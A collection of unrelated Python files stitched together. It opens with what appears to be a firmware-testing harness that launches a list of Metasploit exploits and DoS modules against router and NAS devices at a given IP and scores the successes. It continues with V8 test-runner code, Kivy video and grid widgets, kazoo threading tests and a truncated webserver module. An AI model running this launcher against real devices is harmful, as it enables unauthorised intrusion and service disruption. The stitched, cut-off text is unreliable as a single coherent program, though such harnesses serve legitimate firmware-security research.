56 : "use auxiliary/dos/upnp/miniupnpd_dos",
57 : "use auxiliary/scanner/http/cisco_ios_auth_bypass",
58 : "use auxiliary/scanner/http/cisco_nac_manager_traversal",
59 : "use auxiliary/scanner/http/dlink_user_agent_backdoor",
60 : "use auxiliary/scanner/http/linksys_e1500_traversal",
61 : "use auxiliary/scanner/http/goahead_traversal",
62 : "use auxiliary/scanner/http/litespeed_source_disclosure\nset PATH_SAVE /tmp/",
63 : "use auxiliary/scanner/http/netgear_sph200d_traversal",
64 : "use auxiliary/scanner/ssl/openssl_ccs",
65 : "use auxiliary/scanner/ssl/openssl_heartbleed",
66 : "use auxiliary/scanner/http/allegro_rompager_misfortune_cookie",
67 : "use auxiliary/dos/dns/bind_tkey",
68 : "use exploits/linux/http/synology_dsm_sliceupload_exec_noauth",
69 : "use auxiliary/scanner/snmp/sbg6580_enum",
70 : "use auxiliary/scanner/snmp/arris_dg950",
71 : "use exploits/linux/http/dlink_hnap_login_bof", # Dlink DIR Routers Unauthenticated HNAP Login Stack Buffer Overflow
72 : "use exploits/linux/http/netgear_r7000_cgibin_exec", # Netgear R7000 and R6400 cgi-bin Command Injection, import on 2017/03/20
73 : "use exploits/linux/http/netgear_wnr2000_rce", # NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow, import on 2017/03/27
}
# this attempts to default to stdout if an output file is not provided, but may be buggy
@contextlib.contextmanager
def smart_open(filename, mode):
if filename:
f = open(filename, mode)
else:
f = sys.stdout
try:
yield f
finally:
if f != sys.stdout:
f.close()
def exploit_metasploit(target, eid, outfile=None):
cmd = METASPLOIT_EXPLOITS[eid] % {'target':target}
return cmd + "\nexploit -z\n" if not outfile else "spool " + outfile % \
{'exploit':eid} + "\n" + cmd + "\nexploit -z\nspool off\nsessions -K\n"
def exploit_shell(target, eid, outfile=None):
print("Executing shell command...")
# create log file for this shell command execution
if outfile:
outfile = outfile % {'exploit':eid}
with smart_open(outfile, 'w') as f:
ret = subprocess.run(SHELL_EXPLOITS[eid][0] % {'target': target},
stderr=f, stdout=f, shell=True).returncode
# always run verification command if available; do not attempt early
# termination if the first command appears to fail
# this fixes e.g. 203, which crashes the HTTP server and causes curl to
# return CURLE_GOT_NOTHING (52)
if SHELL_EXPLOITS[eid][1]:
ret = subprocess.run(SHELL_EXPLOITS[eid][1] % \
{'target':target, 'output':outfile}, stderr=f, stdout=f, shell=True).returncode
f.write("\nResult: %d" % ret)
def scoring(outfile):
dbh = psycopg2.connect(database = "exploit", user = "firmadyne",
password = "firmadyne", host = "127.0.01")
cur = dbh.cursor()
print("\n===== Exploited result =====")
exploited = []
for eid in list(METASPLOIT_EXPLOITS.keys()):
cmd = "cat " + outfile % {'exploit' : eid} + " | grep -q +"
rcode = subprocess.call(cmd, shell = True)
if rcode != 1: # exploited!
exploited.append(eid)
if len(exploited) == 0:
print("None")
else:
score = 0
for eid in exploited:
query = """SELECT * FROM module WHERE id = %(eid)s"""
cur.execute(query, {'eid' : eid})
x = cur.fetchone()[1]
print("Exploited module: %s" % x)
query = """SELECT * FROM score WHERE id = %(eid)s"""
cur.execute(query, {'eid' : eid})
y = cur.fetchone()
if y[2] is None:
rank = y[1]
if rank == "Excellent":
s = 10.0
elif rank == "Great":
s = 8.6
elif rank == "Good":
s = 7.1
elif rank == "Normal":
s = 5.7
elif rank == "Average":
s = 4.3
elif rank == "Low":
s = 2.9
elif rank == "Manual":
s = 1.4
else:
s = float(y[2])
print("Score: %.1f" % s)
score = score + (10 - score) * s / 10
print("------------------------------")
print("Total Score: %.2f" % score)
print("============================")
def process(target, exploits, outfile=None):
cmd = "setg RHOST %(target)s\nsetg RHOSTS %(target)s\n\n" % \
{'target': target}
# not great performance, because we will wait until all exploits have
# been processed before starting metasploit with the script
for e in exploits:
if e in METASPLOIT_EXPLOITS:
cmd += exploit_metasploit(target, e, outfile) + "\n"
elif e in SHELL_EXPLOITS:
exploit_shell(target, e, outfile)
else:
print("Unrecognized exploit: %d" % e)
cmd += "quit"
# write metasploit script to attempt exploits
print("Writing script.rc...")
with open("script.rc", 'w') as f:
f.write(cmd)
# create log file for all metasploit exploit execution
if outfile:
logfile = outfile % {'exploit': "metasploit"}
else:
logfile = "/dev/stdout"
print("Executing metasploit command...")
with smart_open(logfile, 'w') as f:
ret = subprocess.run(['/bin/sh', '-c', 'msfconsole -qr script.rc'], stderr=f, stdout=f).returncode
f.write("\nResult: %d" % ret)
# print the exploited result and scoring
scoring(outfile)
def main():
exploits = []
outfile = None
if len (sys.argv) != 7:
print ("Usage: ./runExploits.py -t <target-ip> -o <output-dir> -e <exploits>")
print ("Note: <exploits> can be 'all' or a list of exploits seperated by ','")
exit (1)
opts, argv = getopt.getopt(sys.argv[1:], 'e:t:o:')
for k, v in opts:
if k == '-e':
if v == 'all':
exploits = list (METASPLOIT_EXPLOITS.keys()) + list (SHELL_EXPLOITS.keys())
else:
exploits = [int(x) for x in v.split(',')]
if k == '-t':
target = v
if k == '-o':
if not os.path.isdir(v):
if os.path.exists(v):
os.remove(v)
os.makedirs(v, 0o755);
outfile = v + "/%(exploit)s.log"
process(target, exploits, outfile)
if __name__ == "__main__":
main()
|
|
# Copyright 2017 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import re
import signal
import subprocess
import sys
import threading
import time
from ..local.android import (
android_driver, CommandFailedException, TimeoutException)
from ..local import utils
from ..objects import output
BASE_DIR = os.path.normpath(
os.path.join(os.path.dirname(os.path.abspath(__file__)), '..' , '..', '..'))
SEM_INVALID_VALUE = -1
SEM_NOGPFAULTERRORBOX = 0x0002 # Microsoft Platform SDK WinBase.h
def setup_testing():
"""For testing only: We use threading under the hood instead of
multiprocessing to make coverage work. Signal handling is only supported
in the main thread, so we disable it for testing.
"""
signal.signal = lambda *_: None
class AbortException(Exception):
"""Indicates early abort on SIGINT, SIGTERM or internal hard timeout."""
pass
class BaseCommand(object):
def __init__(self, shell, args=None, cmd_prefix=None, timeout=60, env=None,
verbose=False, resources_func=None):
"""Initialize the command.
Args:
shell: The name of the executable (e.g. d8).
args: List of args to pass to the executable.
cmd_prefix: Prefix of command (e.g. a wrapper script).
timeout: Timeout in seconds.
env: Environment dict for execution.
verbose: Print additional output.
resources_func: Callable, returning all test files needed by this command.
"""
assert(timeout > 0)
self.shell = shell
self.args = args or []
self.cmd_prefix = cmd_prefix or []
self.timeout = timeout
self.env = env or {}
self.verbose = verbose
def execute(self):
if self.verbose:
print '# %s' % self
process = self._start_process()
# Variable to communicate with the signal handler.
abort_occured = [False]
def handler(signum, frame):
self._abort(process, abort_occured)
signal.signal(signal.SIGTERM, handler)
# Variable to communicate with the timer.
timeout_occured = [False]
timer = threading.Timer(
self.timeout, self._abort, [process, timeout_occured])
timer.start()
start_time = time.time()
stdout, stderr = process.communicate()
duration = time.time() - start_time
timer.cancel()
if abort_occured[0]:
raise AbortException()
return output.Output(
process.returncode,
timeout_occured[0],
stdout.decode('utf-8', 'replace').encode('utf-8'),
stderr.decode('utf-8', 'replace').encode('utf-8'),
process.pid,
duration
)
def _start_process(self):
try:
return subprocess.Popen(
args=self._get_popen_args(),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=self._get_env(),
)
except Exception as e:
sys.stderr.write('Error executing: %s\n' % self)
raise e
def _get_popen_args(self):
return self._to_args_list()
def _get_env(self):
env = os.environ.copy()
env.update(self.env)
# GTest shard information is read by the V8 tests runner. Make sure it
# doesn't leak into the execution of gtests we're wrapping. Those might
# otherwise apply a second level of sharding and as a result skip tests.
env.pop('GTEST_TOTAL_SHARDS', None)
env.pop('GTEST_SHARD_INDEX', None)
return env
def _kill_process(self, process):
raise NotImplementedError()
def _abort(self, process, abort_called):
abort_called[0] = True
try:
self._kill_process(process)
except OSError:
pass
def __str__(self):
return self.to_string()
def to_string(self, relative=False):
def escape(part):
# Escape spaces. We may need to escape more characters for this to work
# properly.
if ' ' in part:
return '"%s"' % part
return part
parts = map(escape, self._to_args_list())
cmd = ' '.join(parts)
if relative:
cmd = cmd.replace(os.getcwd() + os.sep, '')
return cmd
def _to_args_list(self):
return self.cmd_prefix + [self.shell] + self.args
class PosixCommand(BaseCommand):
def _kill_process(self, process):
process.kill()
class WindowsCommand(BaseCommand):
def _start_process(self, **kwargs):
# Try to change the error mode to avoid dialogs on fatal errors. Don't
# touch any existing error mode flags by merging the existing error mode.
# See http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx.
def set_error_mode(mode):
prev_error_mode = SEM_INVALID_VALUE
try:
import ctypes
prev_error_mode = (
ctypes.windll.kernel32.SetErrorMode(mode)) #@UndefinedVariable
except ImportError:
pass
return prev_error_mode
error_mode = SEM_NOGPFAULTERRORBOX
prev_error_mode = set_error_mode(error_mode)
set_error_mode(error_mode | prev_error_mode)
try:
return super(WindowsCommand, self)._start_process(**kwargs)
finally:
if prev_error_mode != SEM_INVALID_VALUE:
set_error_mode(prev_error_mode)
def _get_popen_args(self):
return subprocess.list2cmdline(self._to_args_list())
def _kill_process(self, process):
if self.verbose:
print 'Attempting to kill process %d' % process.pid
sys.stdout.flush()
tk = subprocess.Popen(
'taskkill /T /F /PID %d' % process.pid,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
stdout, stderr = tk.communicate()
if self.verbose:
print 'Taskkill results for %d' % process.pid
print stdout
print stderr
print 'Return code: %d' % tk.returncode
sys.stdout.flush()
class AndroidCommand(BaseCommand):
def __init__(self, shell, args=None, cmd_prefix=None, timeout=60, env=None,
verbose=False, resources_func=None):
"""Initialize the command and all files that need to be pushed to the
Android device.
"""
self.shell_name = os.path.basename(shell)
self.shell_dir = os.path.dirname(shell)
self.files_to_push = (resources_func or (lambda: []))()
# Make all paths in arguments relative and also prepare files from arguments
# for pushing to the device.
rel_args = []
find_path_re = re.compile(r'.*(%s/[^\'"]+).*' % re.escape(BASE_DIR))
for arg in (args or []):
match = find_path_re.match(arg)
if match:
self.files_to_push.append(match.group(1))
rel_args.append(
re.sub(r'(.*)%s/(.*)' % re.escape(BASE_DIR), r'\1\2', arg))
super(AndroidCommand, self).__init__(
shell, args=rel_args, cmd_prefix=cmd_prefix, timeout=timeout, env=env,
verbose=verbose)
def execute(self, **additional_popen_kwargs):
"""Execute the command on the device.
This pushes all required files to the device and then runs the command.
"""
if self.verbose:
print '# %s' % self
android_driver().push_executable(self.shell_dir, 'bin', self.shell_name)
for abs_file in self.files_to_push:
abs_dir = os.path.dirname(abs_file)
file_name = os.path.basename(abs_file)
rel_dir = os.path.relpath(abs_dir, BASE_DIR)
android_driver().push_file(abs_dir, file_name, rel_dir)
start_time = time.time()
return_code = 0
timed_out = False
try:
stdout = android_driver().run(
'bin', self.shell_name, self.args, '.', self.timeout, self.env)
except CommandFailedException as e:
return_code = e.status
stdout = e.output
except TimeoutException as e:
return_code = 1
timed_out = True
# Sadly the Android driver doesn't provide output on timeout.
stdout = ''
duration = time.time() - start_time
return output.Output(
return_code,
timed_out,
stdout,
'', # No stderr available.
-1, # No pid available.
duration,
)
Command = None
def setup(target_os):
"""Set the Command class to the OS-specific version."""
global Command
if target_os == 'android':
Command = AndroidCommand
elif target_os == 'windows':
Command = WindowsCommand
else:
Command = PosixCommand
def tear_down():
"""Clean up after using commands."""
if Command == AndroidCommand:
android_driver().tear_down()
|
|
'''
Video
=====
Core class for reading video files and managing the video
:class:`~kivy.graphics.texture.Texture`.
.. versionchanged:: 1.10.0
The pyglet, pygst and gi providers have been removed.
.. versionchanged:: 1.8.0
There are now 2 distinct Gstreamer implementations: one using Gi/Gst
working for both Python 2+3 with Gstreamer 1.0, and one using PyGST
working only for Python 2 + Gstreamer 0.10.
.. note::
Recording is not supported.
'''
__all__ = ('VideoBase', 'Video')
from kivy.clock import Clock
from kivy.core import core_select_lib
from kivy.event import EventDispatcher
from kivy.logger import Logger
from kivy.compat import PY2
class VideoBase(EventDispatcher):
'''VideoBase, a class used to implement a video reader.
:Parameters:
`filename`: str
Filename of the video. Can be a file or an URI.
`eos`: str, defaults to 'pause'
Action to take when EOS is hit. Can be one of 'pause', 'stop' or
'loop'.
.. versionchanged:: 1.4.0
added 'pause'
`async`: bool, defaults to True
Load the video asynchronously (may be not supported by all
providers).
`autoplay`: bool, defaults to False
Auto play the video on init.
:Events:
`on_eos`
Fired when EOS is hit.
`on_load`
Fired when the video is loaded and the texture is available.
`on_frame`
Fired when a new frame is written to the texture.
'''
__slots__ = ('_wantplay', '_buffer', '_filename', '_texture',
'_volume', 'eos', '_state', '_async', '_autoplay')
__events__ = ('on_eos', 'on_load', 'on_frame')
def __init__(self, **kwargs):
kwargs.setdefault('filename', None)
kwargs.setdefault('eos', 'stop')
kwargs.setdefault('async', True)
kwargs.setdefault('autoplay', False)
super(VideoBase, self).__init__()
self._wantplay = False
self._buffer = None
self._filename = None
self._texture = None
self._volume = 1.
self._state = ''
self._autoplay = kwargs.get('autoplay')
self._async = kwargs.get('async')
self.eos = kwargs.get('eos')
if self.eos == 'pause':
Logger.warning("'pause' is deprecated. Use 'stop' instead.")
self.eos = 'stop'
self.filename = kwargs.get('filename')
Clock.schedule_interval(self._update, 1 / 30.)
if self._autoplay:
self.play()
def __del__(self):
self.unload()
def on_eos(self):
pass
def on_load(self):
pass
def on_frame(self):
pass
def _get_filename(self):
return self._filename
def _set_filename(self, filename):
if filename == self._filename:
return
self.unload()
self._filename = filename
if self._filename is None:
return
self.load()
filename = property(lambda self: self._get_filename(),
lambda self, x: self._set_filename(x),
doc='Get/set the filename/uri of the current video')
def _get_position(self):
return 0
def _set_position(self, pos):
self.seek(pos)
position = property(lambda self: self._get_position(),
lambda self, x: self._set_position(x),
doc='Get/set the position in the video (in seconds)')
def _get_volume(self):
return self._volume
def _set_volume(self, volume):
self._volume = volume
volume = property(lambda self: self._get_volume(),
lambda self, x: self._set_volume(x),
doc='Get/set the volume in the video (1.0 = 100%)')
def _get_duration(self):
return 0
duration = property(lambda self: self._get_duration(),
doc='Get the video duration (in seconds)')
def _get_texture(self):
return self._texture
texture = property(lambda self: self._get_texture(),
doc='Get the video texture')
def _get_state(self):
return self._state
state = property(lambda self: self._get_state(),
doc='Get the video playing status')
def _do_eos(self, *args):
'''
.. versionchanged:: 1.4.0
Now dispatches the `on_eos` event.
'''
if self.eos == 'pause':
self.pause()
elif self.eos == 'stop':
self.stop()
elif self.eos == 'loop':
self.position = 0
self.play()
self.dispatch('on_eos')
def _update(self, dt):
'''Update the video content to texture.
'''
pass
def seek(self, percent, precise=True):
'''Move to position as percentage (strictly, a proportion from
0 - 1) of the duration'''
pass
def stop(self):
'''Stop the video playing'''
self._state = ''
def pause(self):
'''Pause the video
.. versionadded:: 1.4.0
'''
self._state = 'paused'
def play(self):
'''Play the video'''
self._state = 'playing'
def load(self):
'''Load the video from the current filename'''
pass
def unload(self):
'''Unload the actual video'''
self._state = ''
# Load the appropriate provider
video_providers = []
try:
from kivy.lib.gstplayer import GstPlayer # NOQA
video_providers += [('gstplayer', 'video_gstplayer', 'VideoGstplayer')]
except ImportError:
pass
video_providers += [
('ffmpeg', 'video_ffmpeg', 'VideoFFMpeg'),
('ffpyplayer', 'video_ffpyplayer', 'VideoFFPy'),
('null', 'video_null', 'VideoNull')]
Video = core_select_lib('video', video_providers)
|
|
import threading
import unittest
import mock
from nose.tools import assert_raises
from nose.tools import eq_
from nose.tools import raises
class TestThreadingHandler(unittest.TestCase):
def _makeOne(self, *args):
from kazoo.handlers.threading import SequentialThreadingHandler
return SequentialThreadingHandler(*args)
def _getAsync(self, *args):
from kazoo.handlers.threading import AsyncResult
return AsyncResult
def test_proper_threading(self):
h = self._makeOne()
h.start()
# In Python 3.3 _Event is gone, before Event is function
event_class = getattr(threading, '_Event', threading.Event)
assert isinstance(h.event_object(), event_class)
def test_matching_async(self):
h = self._makeOne()
h.start()
async = self._getAsync()
assert isinstance(h.async_result(), async)
def test_exception_raising(self):
h = self._makeOne()
@raises(h.timeout_exception)
def testit():
raise h.timeout_exception("This is a timeout")
testit()
def test_double_start_stop(self):
h = self._makeOne()
h.start()
self.assertTrue(h._running)
h.start()
h.stop()
h.stop()
self.assertFalse(h._running)
class TestThreadingAsync(unittest.TestCase):
def _makeOne(self, *args):
from kazoo.handlers.threading import AsyncResult
return AsyncResult(*args)
def _makeHandler(self):
from kazoo.handlers.threading import SequentialThreadingHandler
return SequentialThreadingHandler()
def test_ready(self):
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
eq_(async.ready(), False)
async.set('val')
eq_(async.ready(), True)
eq_(async.successful(), True)
eq_(async.exception, None)
def test_callback_queued(self):
mock_handler = mock.Mock()
mock_handler.completion_queue = mock.Mock()
async = self._makeOne(mock_handler)
async.rawlink(lambda a: a)
async.set('val')
assert mock_handler.completion_queue.put.called
def test_set_exception(self):
mock_handler = mock.Mock()
mock_handler.completion_queue = mock.Mock()
async = self._makeOne(mock_handler)
async.rawlink(lambda a: a)
async.set_exception(ImportError('Error occured'))
assert isinstance(async.exception, ImportError)
assert mock_handler.completion_queue.put.called
def test_get_wait_while_setting(self):
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
lst = []
bv = threading.Event()
cv = threading.Event()
def wait_for_val():
bv.set()
val = async.get()
lst.append(val)
cv.set()
th = threading.Thread(target=wait_for_val)
th.start()
bv.wait()
async.set('fred')
cv.wait()
eq_(lst, ['fred'])
th.join()
def test_get_with_nowait(self):
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
timeout = self._makeHandler().timeout_exception
@raises(timeout)
def test_it():
async.get(block=False)
test_it()
@raises(timeout)
def test_nowait():
async.get_nowait()
test_nowait()
def test_get_with_exception(self):
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
lst = []
bv = threading.Event()
cv = threading.Event()
def wait_for_val():
bv.set()
try:
val = async.get()
except ImportError:
lst.append('oops')
else:
lst.append(val)
cv.set()
th = threading.Thread(target=wait_for_val)
th.start()
bv.wait()
async.set_exception(ImportError)
cv.wait()
eq_(lst, ['oops'])
th.join()
def test_wait(self):
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
lst = []
bv = threading.Event()
cv = threading.Event()
def wait_for_val():
bv.set()
try:
val = async.wait(10)
except ImportError:
lst.append('oops')
else:
lst.append(val)
cv.set()
th = threading.Thread(target=wait_for_val)
th.start()
bv.wait(10)
async.set("fred")
cv.wait(15)
eq_(lst, [True])
th.join()
def test_set_before_wait(self):
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
lst = []
cv = threading.Event()
async.set('fred')
def wait_for_val():
val = async.get()
lst.append(val)
cv.set()
th = threading.Thread(target=wait_for_val)
th.start()
cv.wait()
eq_(lst, ['fred'])
th.join()
def test_set_exc_before_wait(self):
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
lst = []
cv = threading.Event()
async.set_exception(ImportError)
def wait_for_val():
try:
val = async.get()
except ImportError:
lst.append('ooops')
else:
lst.append(val)
cv.set()
th = threading.Thread(target=wait_for_val)
th.start()
cv.wait()
eq_(lst, ['ooops'])
th.join()
def test_linkage(self):
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
cv = threading.Event()
lst = []
def add_on():
lst.append(True)
def wait_for_val():
async.get()
cv.set()
th = threading.Thread(target=wait_for_val)
th.start()
async.rawlink(add_on)
async.set('fred')
assert mock_handler.completion_queue.put.called
async.unlink(add_on)
cv.wait()
eq_(async.value, 'fred')
th.join()
def test_linkage_not_ready(self):
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
lst = []
def add_on():
lst.append(True)
async.set('fred')
assert not mock_handler.completion_queue.called
async.rawlink(add_on)
assert mock_handler.completion_queue.put.called
def test_link_and_unlink(self):
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
lst = []
def add_on():
lst.append(True)
async.rawlink(add_on)
assert not mock_handler.completion_queue.put.called
async.unlink(add_on)
async.set('fred')
assert not mock_handler.completion_queue.put.called
def test_captured_exception(self):
from kazoo.handlers.utils import capture_exceptions
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
@capture_exceptions(async)
def exceptional_function():
return 1/0
exceptional_function()
assert_raises(ZeroDivisionError, async.get)
def test_no_capture_exceptions(self):
from kazoo.handlers.utils import capture_exceptions
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
lst = []
def add_on():
lst.append(True)
async.rawlink(add_on)
@capture_exceptions(async)
def regular_function():
return True
regular_function()
assert not mock_handler.completion_queue.put.called
def test_wraps(self):
from kazoo.handlers.utils import wrap
mock_handler = mock.Mock()
async = self._makeOne(mock_handler)
lst = []
def add_on(result):
lst.append(result.get())
async.rawlink(add_on)
@wrap(async)
def regular_function():
return 'hello'
assert regular_function() == 'hello'
assert mock_handler.completion_queue.put.called
assert async.get() == 'hello'
|
|
"""All widgets in the kivy-grid-cells package"""
from contextlib import contextmanager
import logging
from kivy.properties import (
NumericProperty,
ListProperty,
BooleanProperty,
)
from kivy.uix.relativelayout import RelativeLayout
from kivy.uix.widget import Widget
import numpy as np
from .constants import Colours, States
log = logging.getLogger(__name__)
__all__ = ["GridCell", "DrawableGrid"]
class GridCell(Widget):
"""A cell within the grid. This can be activated by clicking it."""
state = NumericProperty(States.DEACTIVATED)
border_state = NumericProperty(States.DEACTIVATED)
colour = ListProperty(Colours[States.DEACTIVATED])
border_colour = ListProperty((0, 0, 0, 0))
def __init__(self, cell_size, coordinates):
self.coordinates = coordinates
column_number, row_number = coordinates
kwargs = {
"size_hint": [None, None],
"size": [cell_size, cell_size],
}
super(GridCell, self).__init__(**kwargs)
self.update_canvas()
def update_canvas(self):
""" Update the canvas with the current state of the cell
>>> cell = GridCell(1, (0, 0))
>>> cell.state = States.FIRST
>>> cell.update_canvas()
>>> cell.colour == list(Colours[States.FIRST])
True
>>> cell.border_colour
[0, 0, 0, 0]
>>> cell.border_state = States.SECOND
>>> cell.update_canvas()
>>> cell.border_colour == list(Colours[States.SECOND])
True
"""
self.colour = Colours[self.state]
if self.border_state == States.DEACTIVATED:
self.border_colour = (0, 0, 0, 0) # Transparent
else:
self.border_colour = Colours[self.border_state]
def update_parent_cell(self):
self.parent.update_cells(self.coordinates, self.state)
def set_state(self, state):
""" Set the fill state of the cell
>>> import mock
>>> cell = GridCell(1, (0, 0))
>>> cell.parent = mock.Mock()
>>> cell.set_state(States.FIRST)
>>> cell.state == States.FIRST
True
>>> cell.colour == list(Colours[States.FIRST])
True
"""
if hasattr(state, "dtype"):
assert state.dtype == int, state.dtype
state = int(state)
self.state = state
self.update_canvas()
self.update_parent_cell()
log.debug("Set state of {} to {}".format(self, state))
def set_border_state(self, state):
""" Set the border state of the cell
>>> cell = GridCell(1, (0, 0))
>>> cell.set_border_state(States.FIRST)
>>> cell.state == States.DEACTIVATED
True
>>> cell.colour == list(Colours[States.DEACTIVATED])
True
>>> cell.border_colour == list(Colours[States.FIRST])
True
"""
if hasattr(state, "dtype"):
assert state.dtype == int, state.dtype
state = int(state)
self.border_state = state
self.update_canvas()
def handle_touch(self):
""" Flip the cell's state between on and off
>>> import mock
>>> cell = GridCell(1, (0, 0))
>>> cell.parent = mock.Mock(selected_state=States.FIRST)
>>> new_state = cell.handle_touch()
>>> new_state == cell.state == States.FIRST
True
>>> new_state = cell.handle_touch()
>>> new_state == cell.state == States.DEACTIVATED
True
"""
if self.state == self.parent.selected_state:
new_state = States.DEACTIVATED
else:
new_state = self.parent.selected_state
self.set_state(new_state)
return new_state
def on_touch_down(self, evt):
if not self.collide_point(*evt.pos):
# Not on this square
return
self.handle_touch()
def on_touch_move(self, evt):
if not self.collide_point(*evt.pos):
# Not on this square
return super(GridCell, self).on_touch_move(evt)
if self.collide_point(*evt.ppos):
# Not moved to this square
return super(GridCell, self).on_touch_move(evt)
if self.parent.drag_state is None:
self.parent.drag_state = (
self.parent.selected_state
if self.state == States.DEACTIVATED else States.DEACTIVATED
)
elif self.parent.drag_state == self.state:
return
self.handle_touch()
def on_touch_up(self, evt):
if self.parent.drag_state is not None:
self.parent.drag_state = None
def __repr__(self):
return "{}<{}>".format(self.__class__.__name__,
", ".join(str(c) for c in self.coordinates))
class DrawableGrid(RelativeLayout):
"""A grid of cells that can be in a number of states"""
rows = NumericProperty()
cols = NumericProperty()
cell_size = NumericProperty(25)
selected_state = NumericProperty(States.FIRST)
grids = ListProperty()
num_grids = NumericProperty(1)
CELLS_GRID = 0
GRID_CELL_CLASS = GridCell
def __init__(self, *args, **kwargs):
super(DrawableGrid, self).__init__(*args, **kwargs)
self._cells = None
def cell_coordinates(self, pos, is_absolute=True):
""" Determine which cell corresponds to absolute or relative position
:param pos: Position in pixels
:type pos: 2-tuple
:param is_absolute: Is pos an absolute or relative position?
:type pos: bool
>>> import mock
>>> grid = DrawableGrid(cell_size=5)
>>> grid.to_widget = mock.Mock()
>>> grid.to_widget.return_value = (111, 111)
>>> # Returns calculated value
>>> grid.cell_coordinates((26, 35), is_absolute=False)
(5, 7)
>>> grid.to_widget.called
False
>>> # Returns mocked value
>>> grid.cell_coordinates((26, 35))
(22, 22)
>>> grid.to_widget.called
True
"""
if is_absolute:
pos = self.to_widget(*pos)
return (pos[0] // self.cell_size,
pos[1] // self.cell_size)
def init_cells(self):
""" Sets up the grid arrays and the cell widgets
Simple example:
>>> grid = DrawableGrid()
>>> grid.init_cells()
>>> grid.grids
[array([], shape=(0, 0), dtype=int64)]
>>> [g.flags.writeable for g in grid.grids]
[False]
>>> grid.cell_widgets
[]
Example with some cells and multiple grids:
>>> grid = DrawableGrid(rows=2, cols=1, num_grids=3)
>>> grid.init_cells()
>>> grid.grids
[array([[0, 0]]), array([[0, 0]]), array([[0, 0]])]
>>> [g.flags.writeable for g in grid.grids]
[False, False, False]
>>> grid.cell_widgets
[[GridCell<0, 0>], [GridCell<0, 1>]]
Check that overwriting is forbidden
>>> grid.init_cells()
Traceback (most recent call last):
RuntimeError: Cells already initialised!
"""
if self._cells is not None:
raise RuntimeError("Cells already initialised!")
self._setup_cell_widgets()
self._cells = np.zeros(dtype=int, shape=(self.cols, self.rows))
self.grids = [self._cells]
for num in range(1, self.num_grids):
self.grids.append(self._cells.copy())
for grid in self.grids:
grid.setflags(write=False)
self.drag_state = None
def _setup_cell_widgets(self):
self.cell_widgets = []
for row_number in xrange(self.rows):
row = []
for column_number in xrange(self.cols):
cell = self.GRID_CELL_CLASS(
self.cell_size, (column_number, row_number))
cell.y = (row_number) * self.cell_size
cell.x = (column_number) * self.cell_size
row.append(cell)
self.cell_widgets.append(row)
with self.canvas:
for row in self.cell_widgets:
for cell in row:
self.add_widget(cell)
@contextmanager
def _writable_grid(self, index):
"""Set self.grids[index] to be writable, then unset it"""
grid = self.grids[index]
try:
grid.setflags(write=True)
yield
finally:
grid.setflags(write=False)
return
def on_cells_updated(self):
"""This is a hook to update things when the cells have been updated"""
pass
@property
def writable_cells(self):
"""
Usage:
>>> grid = DrawableGrid()
>>> grid.init_cells()
>>> grid.cells.flags.writeable
False
>>> with grid.writable_cells:
... grid.cells.flags.writeable
True
>>> grid.cells.flags.writeable
False
"""
return self._writable_grid(index=self.CELLS_GRID)
def update_cells(self, coordinates, state):
""" Set cell state at coordinates.
:param coordinates: Cell coordinates to update
:type coordinates: 2-tuple
:param state: New state for the cell
:type state: int
>>> grid = DrawableGrid(rows=2, cols=1)
>>> grid.init_cells()
>>> grid.cells
array([[0, 0]])
>>> grid.update_cells((0, 0), 1)
>>> grid.cells
array([[1, 0]])
"""
with self.writable_cells:
self._cells[coordinates] = state
self.on_cells_updated()
def set_cell_state(self, cell, y, x):
cell.set_state(self.cells[y, x])
def update_cell_widgets(self):
""" Set each cell widget's state according to the state of the np grid
>>> grid = DrawableGrid(rows=2, cols=1)
>>> grid.init_cells()
>>> grid.cells = np.array([[1, 2]])
>>> grid.update_cell_widgets()
>>> grid.cell_widgets[0][0].state
1
>>> grid.cell_widgets[1][0].state
2
"""
for x, row in enumerate(self.cell_widgets):
for y, cell in enumerate(row):
self.set_cell_state(cell, y, x)
def clear_grid(self, index):
""" Replace the chosen grid with a zero grid of the same shape
:param index: Index of the grid to update
:type index: bool
>>> grid = DrawableGrid(rows=2, cols=1)
>>> grid.init_cells()
>>> grid.cells = np.array([[1, 2]])
>>> grid.clear_grid(0)
>>> grid.cells
array([[0, 0]])
"""
new_grid = np.zeros_like(self.grids[index])
if index == self.CELLS_GRID:
# cells property does everything we need
self.cells = new_grid
else:
new_grid.setflags(write=False)
self.grids[index] = new_grid
def clear_grid_for_event(self, grid_index, evt):
""" This is designed to be subclassed, so that only part of the grid
can be cleared, if so desired. """
return self.clear_grid(grid_index)
@property
def cells(self):
return self._cells
@cells.setter
def cells(self, cells):
"""
Cell values can be set here. This will update the related widgets.
"""
if hasattr(cells, "copy"):
# Assume cells is a numpy array
cells = cells.copy()
else:
cells = np.array(cells)
cells.setflags(write=False)
assert cells.ndim == 2, cells.ndim
assert cells.shape == self._cells.shape, "{} != {}".format(
cells.shape, self._cells.shape)
assert cells.dtype == self._cells.dtype, "{} != {}".format(
cells.dtype, self._cells.dtype)
self._cells = cells
self.grids[self.CELLS_GRID] = cells
self.on_cells_updated()
self.update_cell_widgets()
|
|
import math
import uuid
import base64
import psycopg2.extras
from pred.webserver.customlist import CustomList, does_custom_list_exist, get_gene_name_set
from pred.queries.predictionquery import PredictionQuery
from pred.queries.maxpredictionquery import MaxPredictionQuery
from pred.queries.genelistquery import GeneListQuery
from pred.queries.rangelistquery import RangeListQuery
CUSTOM_GENE_LIST = 'Custom Gene List'
CUSTOM_RANGES_LIST = 'Custom Ranges List'
CUSTOM_GENE_NAME_TYPE = 'gene_name'
CUSTOM_ID_TYPE = 'id'
def get_predictions_with_guess(db, config, genome, args):
